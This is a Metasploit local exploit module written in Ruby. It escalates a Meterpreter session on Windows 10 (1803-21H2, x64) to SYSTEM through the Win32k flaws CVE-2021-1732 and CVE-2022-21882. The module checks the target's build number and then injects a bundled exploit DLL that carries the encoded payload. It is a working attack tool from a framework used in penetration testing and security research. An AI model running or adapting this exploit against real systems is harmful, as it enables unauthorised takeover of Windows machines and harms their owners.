1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = AverageRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Windows::Priv
11
  include Msf::Post::Windows::Process
12
  include Msf::Post::Windows::ReflectiveDLLInjection
13
  prepend Msf::Exploit::Remote::AutoCheck
14

15
  include Msf::Exploit::Deprecated
16
  moved_from 'exploit/windows/local/cve_2021_1732_win32k'
17

18
  def initialize(info = {})
19
    super(
20
      update_info(
21
        info,
22
        {
23
          'Name' => 'Win32k ConsoleControl Offset Confusion',
24
          'Description' => %q{
25
            A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
26
            NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
27
            treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
28
            achieve an out of bounds write operation, eventually leading to privilege escalation.
29

30
            This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
31
            In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
32
            is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
33
            function on a wider range of Windows 10 targets.
34
          },
35
          'License' => MSF_LICENSE,
36
          'Author' => [
37
            # CVE-2021-1732
38
            'BITTER APT', # exploit as used in the wild
39
            'JinQuan', # detailed analysis
40
            'MaDongZe', # detailed analysis
41
            'TuXiaoYi', # detailed analysis
42
            'LiHao', # detailed analysis
43
            # CVE-2022-21882
44
            'L4ys', # github poc
45
            # both CVEs
46
            'KaLendsi', # github pocs
47
            # Metasploit exploit
48
            'Spencer McIntyre' # metasploit module
49
          ],
50
          'Platform' => 'win',
51
          'SessionTypes' => [ 'meterpreter' ],
52
          'DefaultOptions' => {
53
            'EXITFUNC' => 'thread'
54
          },
55
          'Targets' => [
56
            [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
57
          ],
58
          'Payload' => {
59
            'DisableNops' => true
60
          },
61
          'References' => [
62
            # CVE-2021-1732 references
63
            [ 'CVE', '2021-1732' ],
64
            [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
65
            [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
66
            [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
67
            [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
68
            # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
69
            [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
70
            [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
71
            [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
72
            [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
73
            # CVE-2022-21882 references
74
            [ 'CVE', '2022-21882' ],
75
            [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
76
            [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
77
          ],
78
          'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
79
          'DefaultTarget' => 0,
80
          'Notes' => {
81
            'Stability' => [ CRASH_OS_RESTARTS, ],
82
            'Reliability' => [ REPEATABLE_SESSION, ],
83
            'SideEffects' => []
84
          }
85
        }
86
      )
87
    )
88
  end
89

90
  def check
91
    if session.platform != 'windows'
92
      # Non-Windows systems are definitely not affected.
93
      return Exploit::CheckCode::Safe
94
    end
95

96
    version = get_version_info
97
    vprint_status("Windows Build Number = #{version.product_name}")
98
    if version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_21H2)
99
      CheckCode::Appears
100
    elsif version.build_number == Msf::WindowsVersion::Server2022 || version.build_number == Msf::WindowsVersion::Win11_21H2
101
      CheckCode::Detected("May be vulnerable, but exploit not tested on #{version.product_name}")
102
    else
103
      print_error('Vulnerability only present on Windows 10 versions 1803 - 21H2, Windows 11 21H2, Server 2019 and Server 2022')
104
      return CheckCode::Safe
105
    end
106
  end
107

108
  def exploit
109
    if is_system?
110
      fail_with(Failure::None, 'Session is already elevated')
111
    end
112

113
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
114
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
115
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
116
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
117
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
118
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
119
    end
120

121
    encoded_payload = payload.encoded
122
    execute_dll(
123
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),
124
      [encoded_payload.length].pack('I<') + encoded_payload
125
    )
126

127
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
128
  end
129
end
130

131